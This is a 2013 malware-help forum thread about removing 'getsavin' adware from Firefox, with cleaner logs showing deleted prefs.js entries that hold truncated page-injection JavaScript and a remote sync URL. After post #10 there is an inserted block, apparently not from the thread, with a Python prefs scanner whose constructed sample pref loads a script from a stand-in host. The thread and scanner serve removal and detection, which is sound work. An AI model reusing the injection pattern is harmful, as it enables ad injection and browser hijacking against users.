getsavin malware



#1 loaf

Posted 23 November 2013 - 08:53 AM

So, somehow these annoying ads from getsavin pop up all the time. I'm mostly using Firefox and it is not in the add-ons/extensions list. It's also not listed in Control Panel's Add/Remove Programs. I've run a full scan with Malwarebytes. I'm at a loss as to how to remove this. Does anyone have any instructions? Thanks!


Edited by hamluis, 23 November 2013 - 09:37 AM.
Moved from XP to Am I Infected - Hamluis.



#2 dc3

Posted 23 November 2013 - 09:23 AM

Hi loaf, and welcome to Bleeping Computer.

 

Did you run the full scan with malwarebytes?

 

Please download AdwCleaner and run it.
 
The AdwCleaner window will open; click on Scan.
 
Once the search is complete, a list of the pending items will be displayed. If you see any which you do not want removed, remove the check mark next to it.

Click on Clean to remove the selected items.

You will receive a message telling you that all programs will be closed so that the infections can be removed. Click on Ok.

When the cleaning process is complete, a log of what was removed will be presented. Please copy and paste this log in your next post.

Family and loved ones will always be a priority in my daily life.  You never know when one will leave you.

 

 

 

 


#3 loaf (Topic Starter)

Posted 23 November 2013 - 12:36 PM

Thanks dc3.

I did run the full scan of Malwarebytes and deleted what it found.

Here's the log:

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\AVG Security Toolbar
Folder Deleted : C:\ProgramData\SoftSafe
Folder Deleted : C:\ProgramData\BrOwwse2Saavei
Folder Deleted : C:\Program Files\PriceGong
Folder Deleted : C:\Users\Scot\AppData\LocalLow\boost_interprocess
Folder Deleted : C:\Users\Scot\AppData\LocalLow\PriceGong
Folder Deleted : C:\Users\Scot\AppData\Roaming\Mozilla\Firefox\Profiles\7fr2t9ds.default\FCTB
Folder Deleted : C:\Users\Scot\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkekdonnbpjjplflmfaeejljoooajbfh
File Deleted : C:\Users\Scot\AppData\Local\Temp\Uninstall.exe
[x] Not Deleted : C:\Program Files\Mozilla Firefox\searchplugins\avg-secure-search.xml

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_d5615630
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BC9FD17D-30F6-4464-9E53-596A90AFF023}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Softonic
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKLM\Software\AVG Secure Search
Key Deleted : HKLM\Software\Freeze.com
Key Deleted : HKLM\Software\SProtector
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16520


-\\ Mozilla Firefox v25.0.1 (en-US)

[ File : C:\Users\Scot\AppData\Roaming\Mozilla\Firefox\Profiles\7fr2t9ds.default\prefs.js ]

Line Deleted : user_pref("aol_toolbar.default.homepage.check", false);
Line Deleted : user_pref("aol_toolbar.default.search.check", false);
Line Deleted : user_pref("browser.search.defaultthis.engineName", "Web Search");
Line Deleted : user_pref("extensions.516b3edb5280e.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}c[...]
Line Deleted : user_pref("extensions.91Cj0UstQN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i+[...]
Line Deleted : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Line Deleted : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Line Deleted : user_pref("extensions.RF1m.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement('script');script.type[...]
Line Deleted : user_pref("extensions.uk1VnnzLluY.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};(function(){if(window.self==window.top&&!document.getElementById('shk85shssm[...]
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
Line Deleted : user_pref("sweetim.toolbar.previous.keyword.URL", "");
Line Deleted : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.enable", "");

-\\ Google Chrome v

[ File : C:\Users\Scot\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [4890 octets] - [23/11/2013 12:26:45]
AdwCleaner[S0].txt - [4920 octets] - [23/11/2013 12:28:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4980 octets] ##########
 



#4 dc3

Posted 23 November 2013 - 12:41 PM

Are the popups still occurring?



#5 loaf (Topic Starter)

Posted 23 November 2013 - 12:42 PM

Popups, not so much.

But there are ads on my message boards that shouldn't be there, and words are underlined so as to make them an ad. That's not supposed to happen either.



#6 loaf (Topic Starter)

Posted 23 November 2013 - 12:43 PM

"Ads not by this site" is what the ads on the message boards have underneath them.


Edited by loaf, 23 November 2013 - 12:43 PM.


#7 loaf (Topic Starter)

Posted 23 November 2013 - 12:46 PM

When I hover over the underlined words, the getsavin logo is there on the ad.

Just got a popup.



#8 dc3

Posted 23 November 2013 - 12:51 PM

I'm going to request that this topic be moved to the Am I Infected forum where other members who are more adept at dealing with this type of problem are available.




#9 xXToffeeXx (Malware Response Instructor)

Posted 23 November 2013 - 01:42 PM

I'm going to request that this topic be moved to the Am I Infected forum where other members who are more adept at dealing with this type of problem are available.

It is already in AII, dc3; I requested it be moved during your second post, as it is a malware problem and hence belongs here :)
 
Hello loaf,
 

Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

 

--------


I'd like us to scan your machine with ESET OnlineScan

  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the ESET OnlineScan button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the esetsmartinstaller_enu.exe icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

 

xXToffeeXx~


Edited by xXToffeeXx, 23 November 2013 - 01:44 PM.

~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#10 loaf (Topic Starter)

Posted 23 November 2013 - 05:06 PM

Junkware Removal Tool (JRT) by Thisisu
Version: 6.0.8 (11.05.2013:1)
OS: Windows Vista ™ Home Basic x86
Ran by Scot on Sat 11/23/2013 at 16:57:58.57
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~ Services

~~~ Registry Values

~~~ Registry Keys

~~~ Files

~~~ Folders

~~~ FireFox

Successfully deleted: [File] C:\Users\Scot\AppData\Roaming\mozilla\firefox\profiles\7fr2t9ds.default\searchplugins\infoaxe.xml
Successfully deleted the following from C:\Users\Scot\AppData\Roaming\mozilla\firefox\profiles\7fr2t9ds.default\prefs.js

user_pref("extensions.91Cj0UstQN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-
user_pref("extensions.RF1m.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElem
user_pref("extensions.RF1m.url", "hxxp://getsrv.info/sync2/?q=hfZ9ofV9CShEAen0rjg6pchTB6lKDzt4olljtNtVh7n0rjrFrjsFrdrHrHa7tMFHhd9FrHwFrTrFqHr9qdUMDMlGojUMAe4UojgHqdn8qTaErjU5q
user_pref("extensions.uk1VnnzLluY.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};(function(){if(window.self==window.top&&!document.g
Emptied folder: C:\Users\Scot\AppData\Roaming\mozilla\firefox\profiles\7fr2t9ds.default\minidumps [131 files]

~~~ Event Viewer Logs were cleared

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 11/23/2013 at 17:01:30.20
Computer was rebooted
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
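The prefs.js entries that AdwCleaner (post #3) and JRT (post #10) deleted are the mechanism behind the "ads not by this site" injection: a preference named extensions.<random token>.scode holds JavaScript that a bundled extension evaluates on every page, a matching .url pref points at a remote "sync" endpoint, and the sweetim/aol_toolbar/Babylon prefs redirect the default search engine and homepage. As an added example, not from the thread, AdwCleaner or JRT, here is a Python scanner that parses a Firefox prefs.js and flags those patterns, then strips the flagged lines the way the tools log "Line Deleted". The SAMPLE_PREFS text and the host example.invalid are constructed, modelled on the log entries rather than copied from them; the Mozilla host allow-list is my assumption about which extensions.*.url prefs are legitimate.

```python
"""Scan a Firefox prefs.js for adware-injected preferences.

Added example (not from the thread, AdwCleaner or JRT). Flags the pref
patterns seen in the logs: extensions.<token>.scode holding JavaScript,
extensions.<token>.url pointing at a non-Mozilla host, and toolbar prefs
that hijack search/homepage. SAMPLE_PREFS and example.invalid are
constructed, modelled on the log entries.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# user_pref("name", value);  value is a quoted string, number or bool
PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+)\);\s*$')

# extensions.<token>.scode / extensions.<token>.url, as in the logs
SCRIPT_PREF_RE = re.compile(r"^extensions\.[A-Za-z0-9_]+\.(scode|url)$")

# Search/homepage hijack prefs seen in the AdwCleaner log
HIJACK_PREFS = {"browser.search.defaultthis.engineName", "keyword.URL"}
HIJACK_PREFIXES = ("sweetim.toolbar.", "aol_toolbar.", "extensions.BabylonToolbar.")

# Fragments typical of the injected page scripts in the logs
JS_MARKERS = ("(function(", "document.createElement('script')", "window.self.location")


@dataclass
class Finding:
    line_no: int
    pref: str
    reason: str


def _unquote(raw: str) -> str:
    """Strip the surrounding quotes and backslash escapes of a prefs.js string value."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return re.sub(r"\\(.)", r"\1", raw[1:-1])
    return raw


def _is_mozilla_host(url: str) -> bool:
    """Assumption: legitimate extensions.*.url prefs (update, blocklist) point at Mozilla."""
    host = (urlparse(url).hostname or "").lower()
    return host == "mozilla.org" or host.endswith((".mozilla.org", ".mozilla.com", ".mozilla.net"))


def scan_prefs(text: str) -> list[Finding]:
    """Return one Finding per suspicious user_pref line, in file order."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = PREF_RE.match(line)
        if not m:
            continue
        name, value = m.group(1), _unquote(m.group(2))
        if SCRIPT_PREF_RE.match(name):
            if name.endswith(".scode") and any(k in value for k in JS_MARKERS):
                findings.append(Finding(line_no, name, "JavaScript stored in a pref (injected into pages)"))
            elif (name.endswith(".url") and value.startswith(("http://", "https://"))
                  and not _is_mozilla_host(value)):
                findings.append(Finding(line_no, name, f"remote script/sync URL: {value}"))
        elif name in HIJACK_PREFS or name.startswith(HIJACK_PREFIXES):
            findings.append(Finding(line_no, name, "search/homepage hijack pref"))
    return findings


def strip_findings(text: str, findings: list[Finding]) -> str:
    """Return the prefs.js text with every flagged line removed."""
    bad = {f.line_no for f in findings}
    kept = [ln for i, ln in enumerate(text.splitlines(), 1) if i not in bad]
    return "\n".join(kept) + "\n"


# Constructed sample, modelled on the thread's logs (script shortened, host replaced)
SAMPLE_PREFS = """# Mozilla User Preferences
user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1385220000);
user_pref("extensions.update.url", "https://versioncheck.addons.mozilla.org/update/VersionCheck.php");
user_pref("browser.search.defaultthis.engineName", "Web Search");
user_pref("extensions.RF1m.scode", "(function(){if(window.self==window.top){var script=document.createElement('script');script.src='http://example.invalid/s.js';document.body.appendChild(script);}})();");
user_pref("extensions.RF1m.url", "http://example.invalid/sync2/?q=constructed");
user_pref("sweetim.toolbar.previous.keyword.URL", "");
user_pref("extensions.lastAppVersion", "25.0.1");
"""

if __name__ == "__main__":
    for f in scan_prefs(SAMPLE_PREFS):
        print(f"line {f.line_no}: {f.pref} -> {f.reason}")
```

To run it against a real profile, read the file (for example the path shown in the logs, under AppData\Roaming\Mozilla\Firefox\Profiles\<profile>\prefs.js) with Firefox closed, pass the text to scan_prefs, and write strip_findings output back only after reviewing the findings; Firefox rewrites prefs.js on exit, so edits made while it is running are lost. The .scode check keys on script fragments rather than on the random token name, so it also catches tokens the logs never listed.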



#11 loaf (Topic Starter)

Posted 24 November 2013 - 08:58 AM

Thanks!

C:\Users\All Users\InstallMate\{248F46C0-1C04-456A-A781-5426FF6C6436}\Custom.dll    Win32/InstalleRex.L application    
C:\Users\All Users\InstallMate\{3AD39115-469E-47CC-A527-0EBCE130B3E3}\Custom.dll    Win32/InstalleRex.L application    
C:\Users\All Users\InstallMate\{B298A661-E123-4F00-ADEB-A901697B8497}\Custom.dll    Win32/InstalleRex.L application    
C:\Program Files\InboxAce_1gEI\Installr\1.bin\1gEIPlug.dll    Win32/Toolbar.MyWebSearch application    cleaned by deleting - quarantined
C:\Program Files\InboxAce_1gEI\Installr\1.bin\1gEZSETP.dll    probably a variant of Win32/Toolbar.MyWebSearch.Q application    cleaned by deleting - quarantined
C:\Program Files\InboxAce_1gEI\Installr\1.bin\NP1gEISb.dll    Win32/Toolbar.MyWebSearch application    cleaned by deleting - quarantined
C:\Program Files\Sk-Enhancer\uninstall.exe    a variant of Win32/SProtector.B application    cleaned by deleting - quarantined
C:\ProgramData\InstallMate\{248F46C0-1C04-456A-A781-5426FF6C6436}\Custom.dll    Win32/InstalleRex.L application    cleaned by deleting - quarantined
C:\ProgramData\InstallMate\{3AD39115-469E-47CC-A527-0EBCE130B3E3}\Custom.dll    Win32/InstalleRex.L application    cleaned by deleting - quarantined
C:\ProgramData\InstallMate\{B298A661-E123-4F00-ADEB-A901697B8497}\Custom.dll    Win32/InstalleRex.L application    cleaned by deleting - quarantined
C:\Users\Scot\AppData\LocalLow\InboxAce_1gEI\Installr\Cache\008F7F8D.exe    a variant of Win32/Toolbar.MyWebSearch.O application    cleaned by deleting - quarantined
C:\Users\Scot\Downloads\SoftonicDownloader_for_avancepaint.exe    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20111005105253.600_       149    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120014104749.414_       122    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120104105409.632_       120    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120217105213.275_       120    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120231105442.538_       120    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120328102837.661_        46    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120412102820.756_        46    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120412105158.945_       136    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120419104750.480_       136    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120520121259.212_        76    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120526160721.540_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120526200830.537_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120527195557.360_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120601172610.608_         4    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120610203720.261_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120611031305.468_         6    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120615095912.891_         7    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120727065525.553_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120805121009.689_        79    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120812065505.577_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20120814183345.646_         8    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20121119121522.291_       187    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20130009201201.402_       516    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
C:\Windows\Temp\SBS_VE_AMBR_20130217152450.385_       239    Win32/SoftonicDownloader.A application    cleaned by deleting - quarantined
 



#12 xXToffeeXx (Malware Response Instructor)

Posted 24 November 2013 - 12:02 PM

Hi loaf,

Any difference after running these tools?

If not, then try resetting Firefox and tell me how it is after that.

 

xXToffeeXx~




#13 loaf (Topic Starter)

Posted 24 November 2013 - 06:37 PM

Yes!

I am popup and ad free now.

Thank you soooo much!



#14 xXToffeeXx (Malware Response Instructor)

Posted 26 November 2013 - 03:34 PM

Hi loaf,
 
Good to hear your problem was solved :)
How is your computer running?
 
xXToffeeXx~

Edited by xXToffeeXx, 26 November 2013 - 04:08 PM.



#15 loaf (Topic Starter)

Posted 27 November 2013 - 05:53 PM

Beautifully, thanks again!





